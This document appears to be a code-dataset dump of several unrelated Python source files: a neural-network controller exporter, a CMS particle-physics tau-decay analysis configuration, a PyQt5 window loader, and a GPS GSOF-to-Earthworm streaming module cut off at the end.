{"seq_id":"74009209444","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nimport csv\r\n\r\n\r\n# Exporter class responsible for exporting to files\r\nclass Exporter:\r\n def __init__(self, version):\r\n self.save_location = \"./saves/\"\r\n self.version = version\r\n \r\n \r\n def setSaveLocation(self, value): self.save_location = value\r\n \r\n\r\n def saveUpdatedAvoid(self, filename, wrong_states, loosing_states):\r\n file = open(filename[:-10]+\"UpdateAvoid.hh\", \"w\")\r\n file.write(\"#include \\n#include \\n//size:\"+str(len(wrong_states))+\"\\nstd::vector H{\\n\")\r\n \r\n for i in range(len(wrong_states)):\r\n file.write(str(wrong_states[i][0]) + \", \\n\")\r\n \r\n file.write(\"};\") \r\n file.close()\r\n \r\n print(\"Updated avoid states saved to path:\"+filename[:-10]+\"UpdateAvoid.hh\") \r\n\r\n file = open(\"./simulation/matlab/loosing_\"+filename[12:-11]+\".m\", \"w\")\r\n\r\n for i in range(len(loosing_states[0])):\r\n file.write(\"x{\"+str(i+1)+\"} = [\") \r\n for j in range(len(loosing_states)):\r\n file.write(str(loosing_states[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n\r\n wrong_x = [row[1] for row in wrong_states]\r\n \r\n if len(wrong_x) == 0:\r\n wrong_x.append([])\r\n\r\n for i in range(len(wrong_x[0])):\r\n file.write(\"x{\"+str(i+1+len(wrong_x[0]))+\"} = [\") \r\n for j in range(len(wrong_x)):\r\n file.write(str(wrong_x[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n \r\n file.close() \r\n print(\"Matlab file for unsafe states saved to : ./simulation/matlab/loosing_\"+filename[12:-11]+\".m\")\r\n\r\n file = open(self.save_location + \"loosing_\"+filename[12:-11]+\".m\", \"w\")\r\n \r\n for i in range(len(loosing_states[0])):\r\n file.write(\"x{\"+str(i+1)+\"} = [\") \r\n for j in range(len(loosing_states)):\r\n file.write(str(loosing_states[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n\r\n wrong_x = [row[1] for row in wrong_states]\r\n \r\n if len(wrong_x) == 0:\r\n wrong_x.append([])\r\n\r\n for i in range(len(wrong_x[0])):\r\n file.write(\"x{\"+str(i+1+len(wrong_x[0]))+\"} = [\") \r\n for j in range(len(wrong_x)):\r\n file.write(str(wrong_x[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n \r\n file.close() \r\n print(\"Matlab file for unsafe states saved to : \" + self.save_location + \"loosing_\"+filename[12:-11]+\".m\")\r\n\r\n def saveTrainingData(self, nnm):\r\n \r\n iterations_array = np.array(nnm.iterations)[:, 
None]\r\n fitnesses_array = np.array(nnm.fitnesses)[:, None]\r\n losses_array = np.array(nnm.losses)[:, None]\r\n\r\n training_history = np.concatenate((iterations_array, losses_array, fitnesses_array), axis = 1)\r\n\r\n file = open(self.save_location + \"training_data.csv\", \"w\")\r\n #file.write(\"COTONN v\" + self.version + \" Training data (#\" + str(len(iterations_array)) + \"): \\n\")\r\n np.savetxt(self.save_location + \"training_data.csv\", training_history, delimiter=\",\", header=\"Iteration,Loss,Fitness\", comments='')\r\n file.close()\r\n \r\n print(\"Training data saved to path: \" + self.save_location + \"training_data.csv\")\r\n\r\n \r\n # Save network graph\r\n def saveNetwork(self, nnm):\r\n # Create a saver\r\n self.network_saver = tf.train.Saver()\r\n session = nnm.nn.session\r\n \r\n # Save the given session \r\n self.network_saver.save(session, self.save_location + \"model\") \r\n print(\"\\nModel saved to path: \" + self.save_location + \"model\")\r\n \r\n \r\n # Save network variables\r\n def saveVariables(self, nnm, list_variables): \r\n # Create a saver\r\n self.saver = tf.train.Saver(list_variables)\r\n session = nnm.nn.session\r\n \r\n # Save the given session \r\n self.saver.save(session, self.save_location + \"variable\")\r\n print(\"Variables saved to path: \" + self.save_location + \"variable\")\r\n \r\n \r\n # Save variables as text\r\n def saveRawMLP(self, nnm):\r\n file = open(self.save_location + \"nn.txt\", \"w\")\r\n file.write(\"COTONN v\" + self.version + \" raw NN:\\n\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n file.write(\"\\nW\" + str(i) + \"\\n\")\r\n \r\n np.savetxt(file, weight_eval)\r\n file.write(\"\\nb\" + str(i) + \"\\n\")\r\n np.savetxt(file, bias_eval)\r\n \r\n file.close()\r\n print(\"Raw MLP saved to path: \" + self.save_location + \"nn.txt\")\r\n \r\n \r\n # Save neural network in a very simple format that is executable as a MATLAB script\r\n def saveMatlabMLP(self, controller, nnm):\r\n file = open(self.save_location + \"nn.m\", \"w\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n file.write(\"s_eta = [\")\r\n for x in controller.getStateSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ll = [\")\r\n for x in controller.getStateSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ur = [\")\r\n for x in controller.getStateSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nu_eta = [\")\r\n for x in controller.getInputSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ll = [\")\r\n for x in controller.getInputSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ur = [\")\r\n for x in controller.getInputSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n file.write(\"\\nW{\"+ str(i+1) + \"} = [\")\r\n np.savetxt(file, weight_eval)\r\n file.write(\"];\\n\")\r\n \r\n 
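Editor's note: the saveBinary method further below writes each layer as two little-endian 4-byte shape integers, the raw weight bytes, then the bias length and raw bias bytes. A hedged sketch of reading one layer back from that .cot layout (float32 is assumed, matching TensorFlow's default dtype; adjust if the network used float64):

import numpy as np

def read_layer(f):
    # mirror of saveBinary: rows, cols, weight bytes, bias length, bias bytes
    rows = int.from_bytes(f.read(4), "little")
    cols = int.from_bytes(f.read(4), "little")
    W = np.frombuffer(f.read(rows * cols * 4), dtype=np.float32)
    W = W.reshape(rows, cols)
    n = int.from_bytes(f.read(4), "little")
    b = np.frombuffer(f.read(n * 4), dtype=np.float32)
    return W, b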
file.write(\"\\nb{\" + str(i+1) + \"} = [\")\r\n np.savetxt(file, bias_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.close()\r\n print(\"Matlab MLP saved to path: \" + self.save_location + \"nn.m\")\r\n\r\n file = open(\"simulation/matlab/nn/nn.m\", \"w\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n file.write(\"s_eta = [\")\r\n for x in controller.getStateSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ll = [\")\r\n for x in controller.getStateSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ur = [\")\r\n for x in controller.getStateSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nu_eta = [\")\r\n for x in controller.getInputSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ll = [\")\r\n for x in controller.getInputSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ur = [\")\r\n for x in controller.getInputSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n file.write(\"\\nW{\"+ str(i+1) + \"} = [\")\r\n np.savetxt(file, weight_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nb{\" + str(i+1) + \"} = [\")\r\n np.savetxt(file, bias_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.close()\r\n print(\"Matlab MLP saved to path: simulation/matlab/nn/nn.m\")\r\n \r\n \r\n # Save as a binary dump (smallest representation)\r\n def saveBinary(self, nnm):\r\n file = open(self.save_location + \"nn.cot\",\"wb\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n weight_shape = session.run(tf.shape(weight))\r\n bias_shape = session.run(tf.shape(bias))\r\n \r\n file.write(int(weight_shape[0]).to_bytes(4, \"little\"))\r\n file.write(int(weight_shape[1]).to_bytes(4, \"little\"))\r\n file.write(weight_eval.tostring())\r\n \r\n file.write(int(bias_shape[0]).to_bytes(4, \"little\"))\r\n file.write(bias_eval.tostring())\r\n \r\n # print(weight_shape)\r\n # print(bias_shape)\r\n\r\n print(\"Binary saved to path: \" + self.save_location + \"nn.cot\")\r\n file.close() \r\n \r\n \r\n # Save wrong states as a text file\r\n def saveWrongStates(self, wrong_states):\r\n file = open(self.save_location + \"wrong_states.txt\", \"w\")\r\n file.write(\"COTONN v\" + self.version + \" Wrong states (#\" + str(len(wrong_states)) + \"): \\n\")\r\n \r\n # if(len(wrong_states)== 0): return \r\n \r\n for i in range(len(wrong_states)):\r\n file.write(str(wrong_states[i]).replace('[', '{').replace(']','},') + \"\\n\")\r\n \r\n file.close()\r\n \r\n print(\"Wrong states saved to path: \" + self.save_location + \"wrong_states.txt\")\r\n","repo_name":"anggairawan/COTONNv2.0","sub_path":"src/Exporter.py","file_name":"Exporter.py","file_ext":"py","file_size_in_byte":10637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42236479547","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = 
cms.Process(\"ANALYSIS\")\n\n#PDG IDs\nA_PDGID = 36\nZ_PDGID = 23\nTAU_PDGID = 15\nMU_PDGID = 13\n\n#tau decay types\nTAU_HAD = 0\nTAU_MU = 1\nTAU_E = 2\nTAU_ALL = 3\n\n#tau hadronic decay types\nTAU_ALL_HAD = -1\nTAU_1PRONG_0NEUTRAL = 0\nTAU_1PRONG_1NEUTRAL = 1\nTAU_1PRONG_2NEUTRAL = 2\nTAU_1PRONG_3NEUTRAL = 3\nTAU_1PRONG_NNEUTRAL = 4\nTAU_2PRONG_0NEUTRAL = 5\nTAU_2PRONG_1NEUTRAL = 6\nTAU_2PRONG_2NEUTRAL = 7\nTAU_2PRONG_3NEUTRAL = 8\nTAU_2PRONG_NNEUTRAL = 9\nTAU_3PRONG_0NEUTRAL = 10\nTAU_3PRONG_1NEUTRAL = 11\nTAU_3PRONG_2NEUTRAL = 12\nTAU_3PRONG_3NEUTRAL = 13\nTAU_3PRONG_NNEUTRAL = 14\nTAU_RARE = 15\n\n#no consideration of pT rank\nANY_PT_RANK = -1\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)\n\nprocess.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\n \"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/data1/yohay/NMSSMHiggs_gg_files1-500.root',\n 'file:/data1/yohay/NMSSMHiggs_gg_files501-1000.root'\n ),\n skipEvents = cms.untracked.uint32(0)\n )\n\n#for L1GtStableParametersRcd\nprocess.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\nprocess.GlobalTag.globaltag = cms.string('START52_V9::All')\n\n#for HLT selection\nprocess.load('HLTrigger/HLTfilters/hltHighLevel_cfi')\n\n#define a parameter set to be passed to all modules that utilize GenTauDecayID\ncommonGenTauDecayIDPSet = cms.PSet(momPDGID = cms.int32(A_PDGID),\n chargedHadronPTMin = cms.double(0.0),\n neutralHadronPTMin = cms.double(0.0),\n chargedLeptonPTMin = cms.double(0.0),\n totalPTMin = cms.double(0.0))\n\n#produce gen tau collections\nprocess.genTauSelector = cms.EDFilter(\n 'GenObjectProducer',\n genParticleTag = cms.InputTag('genParticles'),\n absMatchPDGID = cms.uint32(TAU_PDGID),\n genTauDecayIDPSet = commonGenTauDecayIDPSet,\n primaryTauDecayType = cms.uint32(TAU_ALL),\n sisterTauDecayType = cms.uint32(TAU_ALL),\n primaryTauPTRank = cms.int32(0),\n primaryTauHadronicDecayType = cms.int32(TAU_ALL_HAD),\n sisterHadronicDecayType = cms.int32(TAU_ALL_HAD),\n primaryTauAbsEtaMax = cms.double(-1.0),\n countSister = cms.bool(True),\n applyPTCuts = cms.bool(False),\n countKShort = cms.bool(True),\n minNumGenObjectsToPassFilter = cms.uint32(0),\n makeAllCollections = cms.bool(True)\n )\n\n#analyze\nprocess.genTauAnalyzer = cms.EDAnalyzer(\n 'DecayModePTRankAnalyzer',\n outFileName = cms.string('/data1/yohay/NMSSMHiggs_gg_decayModePTRank_analysis.root'),\n tauMuInputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayModeMuPTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayModeMuPTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayModeMuPTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayModeMuPTRank3', 'ANALYSIS')),\n tau1ProngInputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank3', 'ANALYSIS')),\n tau1Prong1Pi0InputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 
'decayMode1Prong1Pi0PTRank3', 'ANALYSIS')),\n tau1Prong2Pi0InputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank3', 'ANALYSIS')),\n tau3ProngInputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank3', 'ANALYSIS')),\n genParticleTag = cms.InputTag('genParticles'),\n genTauDecayIDPSet = commonGenTauDecayIDPSet,\n applyPTCuts = cms.bool(False),\n countKShort = cms.bool(True),\n pTRankColors = cms.vuint32(1, 2, 4, 6),\n pTRankStyles = cms.vuint32(20, 21, 22, 23),\n pTRankEntries = cms.vstring('Highest p_{T}', 'Second highest p_{T}', 'Third highest p_{T}',\n 'Lowest p_{T}'),\n decayModeColors = cms.vuint32(1, 2, 4, 6, 8),\n decayModeStyles = cms.vuint32(20, 21, 22, 23, 24),\n decayModeEntries = cms.vstring('#tau_{#mu}', '#tau_{had}, 1 prong',\n '#tau_{had}, 1 prong + 1 #pi^{0}',\n '#tau_{had}, 1 prong + 2 #pi^{0}', '#tau_{had}, 3 prong')\n )\n\n#path\nprocess.p = cms.Path(process.genTauSelector*process.genTauAnalyzer)\n","repo_name":"rpyohay/boosted-tau-analysis","sub_path":"BoostedTauAnalysis/GenMatchedRecoObjectProducer/test/analyzeDecayModesAndPT.py","file_name":"analyzeDecayModesAndPT.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30230511720","text":"from PyQt5 import uic, QtWidgets\nimport sys\n\nclass CloseWin():\n def __init__(self):\n super(CloseWin, self).__init__()\n self.ui = uic.loadUi(\"closewindows.ui\")\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n closewin = CloseWin()\n closewin.ui.show()\n app.exec_()","repo_name":"changesmile/PYQT_Demo","sub_path":"CloseWindows.py","file_name":"CloseWindows.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36513429138","text":"from struct import unpack\nimport functools\nimport PyEW\nimport socket\nimport math\nimport argparse\nimport json\nimport http.client\nimport urllib\nimport sys\nimport numpy as np\nfrom threading import Thread\nfrom math import radians, sqrt, sin, cos\n\n# Mods by Alberto M. Lopez and Francisco Hernandez to deal with gps time to unix time\n# taken from code time2time.py from https://raw.githubusercontent.com/igors/time2time/master/time2time.py\nimport optparse\nimport time\nimport datetime\n\nsecsInWeek = 604800\nsecsInDay = 86400\nUNIX2GPS = 315964800 # seconds from UNIX to GPS epoch\nGPS_LEAP_SECONDS = 18 # leap seconds since GPS epoch (as of 4/18/2017)\n# A note about the number above: A constant offset between unix time and gps time exist=19, \n# but up to the date above there are 37 leap seconds, therefore, the difference is the number assigned above\n# to the variable GPS_LEAP_SECONDS.\nUSE_UTC = False\n\n\n# Declare the station to be processed: PRSN - Puerto Rico Seismic Network and its ECEF XYZ position\nSTA_X=2353900.1799\nSTA_Y=-5584618.6433\nSTA_Z=1981221.1234\n#\n\n## GSOF CLASS (Can just be imported I think)\n__author__ = \"Henry T. 
Berglund\"\nclass Gsof(object):\n \"\"\" Class to connect to tcp port and parse GSOF messages \"\"\"\n\n def __init__(self, sock=None):\n if sock is None:\n self.sock = socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n else:\n self.sock = sock\n self.msg_dict = {}\n self.msg_bytes = None\n self.checksum = None\n self.rec_dict = {}\n\n def connect(self, host, port):\n self.sock.connect((host, port))\n\n def get_message_header(self):\n data = self.sock.recv(7)\n msg_field_names = ('STX', 'STATUS', 'TYPE', 'LENGTH',\n 'T_NUM', 'PAGE_INDEX', 'MAX_PAGE_INDEX')\n self.msg_dict = dict(zip(msg_field_names, unpack('>7B', data)))\n self.msg_bytes = self.sock.recv(self.msg_dict['LENGTH'] - 3)\n (checksum, etx) = unpack('>2B', self.sock.recv(2))\n\n def checksum256(st):\n \"\"\"Calculate checksum\"\"\"\n return functools.reduce(lambda x, y: x+y, st) % 256\n if checksum-checksum256(self.msg_bytes+data[1:]) == 0:\n self.checksum = True\n else:\n self.checksum = False\n\n def get_records(self):\n while len(self.msg_bytes) > 0:\n # READ THE FIRST TWO BYTES FROM RECORD HEADER\n record_type, record_length = unpack('>2B', self.msg_bytes[0:2])\n self.msg_bytes = self.msg_bytes[2:]\n self.select_record(record_type, record_length)\n\n def select_record(self, record_type, record_length):\n if record_type == 1:\n rec_field_names = ('GPS_TIME', 'GPS_WEEK', 'SVN_NUM',\n 'FLAG_1', 'FLAG_2', 'INIT_NUM')\n rec_values = unpack('>LH4B', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 2:\n rec_field_names = ('LATITUDE', 'LONGITUDE', 'HEIGHT')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n rec_values = list(rec_values)\n rec_values = (math.degrees(rec_values[0]), math.degrees(rec_values[1]), rec_values[2])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 3:\n rec_field_names = ('X_POS', 'Y_POS', 'Z_POS')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 4:\n rec_field_names = ('LOCAL_DATUM_ID', 'LOCAL_DATUM_LAT',\n 'LOCAL_DATUM_LON', 'LOCAL_DATUM_HEIGHT', 'OPRT')\n rec_values = unpack('>8s3dB', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 5:\n rec_field_names = ('LOCAL_DATUM_ID', 'LOCAL_ZONE_ID',\n 'LOCAL_ZONE_NORTH', 'LOCAL_ZONE_EAST', 'LOCAL_DATUM_HEIGHT')\n rec_values = unpack('>2s3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 6:\n rec_field_names = ('DELTA_X', 'DELTA_Y', 'DELTA_Z')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 7:\n rec_field_names = ('DELTA_EAST', 'DELTA_NORTH', 'DELTA_UP')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 8:\n rec_field_names = ('VEL_FLAG', 'VELOCITY', 'HEADING', 'VERT_VELOCITY')\n rec_values = unpack('>B3f', self.msg_bytes[0:record_length])\n 
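# store the decoded velocity record (flag byte plus speed, heading, vertical rate)\n            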
self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 9:\n            rec_field_names = ('PDOP', 'HDOP', 'VDOP', 'TDOP')\n            rec_values = unpack('>4f', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 10:\n            rec_field_names = ('CLOCK_FLAG', 'CLOCK_OFFSET', 'FREQ_OFFSET')\n            rec_values = unpack('>B2d', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 11:\n            rec_field_names = ('POSITION_RMS_VCV', 'VCV_XX', 'VCV_XY', 'VCV_XZ',\n                               'VCV_YY', 'VCV_YZ', 'VCV_ZZ', 'UNIT_VAR_VCV', 'NUM_EPOCHS_VCV')\n            rec_values = unpack('>8fh', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 12:\n            rec_field_names = ('POSITION_RMS_SIG', 'SIG_EAST', 'SIG_NORT', 'COVAR_EN', 'SIG_UP',\n                               'SEMI_MAJOR', 'SEMI_MINOR', 'ORIENTATION', 'UNIT_VAR_SIG',\n                               'NUM_EPOCHS_SIG')\n            rec_values = unpack('>9fh', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 15:\n            rec_field_names = 'SERIAL_NUM'\n            rec_values = unpack('>l', self.msg_bytes[0:record_length])\n            self.rec_dict.update({rec_field_names: rec_values[0]})\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 16:\n            rec_field_names = ('GPS_MS_OF_WEEK', 'CT_GPS_WEEK', 'UTC_OFFSET', 'CT_FLAGS')\n            rec_values = unpack('>l2hB', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 26:\n            rec_field_names = ('UTC_MS_OF_WEEK', 'UTC_GPS_WEEK', 'UTC_SVS_NUM', 'UTC_FLAG_1', 'UTC_FLAG_2',\n                               'UTC_INIT_NUM')\n            rec_values = unpack('>lh4B', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        elif record_type == 34:\n            NUM_OF_SVS = unpack('>B', self.msg_bytes[0:1])  # slice keeps bytes: msg_bytes[0] is an int on Python 3\n            self.msg_bytes = self.msg_bytes[1:]\n            rec_field_names = ('PRN', 'SV_SYSTEM', 'SV_FLAG1', 'SV_FLAG2', 'ELEVATION', 'AZIMUTH',\n                               'SNR_L1', 'SNR_L2', 'SNR_L5')\n            for field in range(len(rec_field_names)):\n                self.rec_dict[rec_field_names[field]] = []\n            for sat in range(NUM_OF_SVS[0]):\n                rec_values = unpack('>5Bh3B', self.msg_bytes[0:10])\n                self.msg_bytes = self.msg_bytes[10:]\n                for num in range(len(rec_field_names)):\n                    self.rec_dict[rec_field_names[num]].append(rec_values[num])\n        elif record_type == 37:\n            rec_field_names = ('BATT_CAPACITY', 'REMAINING_MEM')\n            rec_values = unpack('>hd', self.msg_bytes[0:record_length])\n            self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n            self.msg_bytes = self.msg_bytes[record_length:]\n        else:\n            \"\"\"Unknown record type? 
Skip it for now!\"\"\"\n #print record_type\n self.msg_bytes = self.msg_bytes[record_length:]\n## END GSOF CLASS\n\nclass Gsof2Ring():\n\n def __init__(self, Station = 'PRSN', Network = 'PR', IP = \"localhost\", PORT = 28001):\n # Create a thread for the Module\n self.myThread = Thread(target=self.run)\n\n # Start an EW Module with parent ring 1000, mod_id 8, inst_id 141, heartbeat 30s, debug = False (MODIFY THIS!)\n self.gsof2ring = PyEW.EWModule(1000, 8, 141, 30.0, False) \n\n # Add our Input ring as Ring 0\n self.gsof2ring.add_ring(1000)\n\n # Allow it to start\n self.runs = True\n \n # OPEN GSOF STREAM\n self.GPSRecv = Gsof()\n \n # Init Variable\n self.Station = Station\n self.Network = Network\n \n # Connect to GSOF\n self.GPSRecv.connect(IP, PORT)\n \n # Remember dtype must be int32\n self.dt = np.dtype(np.int32)\n \n def getGps(self): \n # READ GSOF STREAM\n self.GPSRecv.get_message_header()\n self.GPSRecv.get_records()\n\n # PRINT GSOF STREAM; Open pos file\n #outfile = open ('positionlog_xyz', 'a')\n #print \"X = %12.3f Y = %12.3f Z = %12.3f\" % (GPSRecv.rec_dict['X_POS'], GPSRecv.rec_dict['Y_POS'], GPSRecv.rec_dict['Z_POS'])\n \n ## Format time\n gpsweek=(self.GPSRecv.rec_dict['GPS_WEEK'])\n tiempo=(self.GPSRecv.rec_dict['GPS_TIME'])/1000\n gpstime=gpsweek*secsInWeek + tiempo + GPS_LEAP_SECONDS\n unxtime=int(gpstime) + UNIX2GPS - GPS_LEAP_SECONDS\n fecha=(time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.gmtime(unxtime)))\n #print \"%i %i %i %i \" % (gpsweek, tiempo, gpstime, unxtime)\n #print \"%i LAT = %12.8f LON = %12.8f HT = %12.8f\" % (unxtime, GPSRecv.rec_dict['LATITUDE'], GPSRecv.rec_dict['LONGITUDE'], GPSRecv.rec_dict['HEIGHT'])\n \n # Close pos file\n #outfile.write ( \"%s %12.8f %12.8f %12.8f\\n\" % (fecha, GPSRecv.rec_dict['X_POS']-STA_X, GPSRecv.rec_dict['Y_POS']-STA_Y, GPSRecv.rec_dict['Z_POS']-STA_Z))\n #outfile.close()\n \n # Create EW Wave to send\n xdat = (self.GPSRecv.rec_dict['X_POS']-STA_X)*1000\n X = {\n 'station': self.Station,\n 'network': self.Network,\n 'channel': 'GPX',\n 'location': '--',\n 'nsamp': 1,\n 'samprate': 1,\n 'startt': unxtime,\n #'endt': unixtime+1,\n 'datatype': 'i4',\n 'data': np.array([xdat], dtype=self.dt)\n }\n \n ydat = (self.GPSRecv.rec_dict['Y_POS']-STA_Y)*1000\n Y = {\n 'station': self.Station,\n 'network': self.Network,\n 'channel': 'GPY',\n 'location': '--',\n 'nsamp': 1,\n 'samprate': 1,\n 'startt': unxtime,\n #'endt': unxtime + 1,\n 'datatype': 'i4',\n 'data': np.array([ydat], dtype=self.dt)\n }\n \n zdat = (self.GPSRecv.rec_dict['Z_POS']-STA_Z)*1000\n Z = {\n 'station': self.Station,\n 'network': self.Network,\n 'channel': 'GPZ',\n 'location': '--',\n 'nsamp': 1,\n 'samprate': 1,\n 'startt': unxtime,\n #'endt': unxtime + 1,\n 'datatype': 'i4',\n 'data': np.array([zdat], dtype=self.dt)\n }\n \n # Send to EW\n self.gsof2ring.put_wave(0, X)\n self.gsof2ring.put_wave(0, Y)\n self.gsof2ring.put_wave(0, Z)\n \n def run(self):\n \n # The main loop\n while self.runs:\n if self.gsof2ring.mod_sta() is False:\n break\n time.sleep(0.001)\n self.getGps()\n self.gsof2ring.goodbye()\n quit()\n print (\"Exiting\")\n \n def start(self):\n self.myThread.start()\n \n def 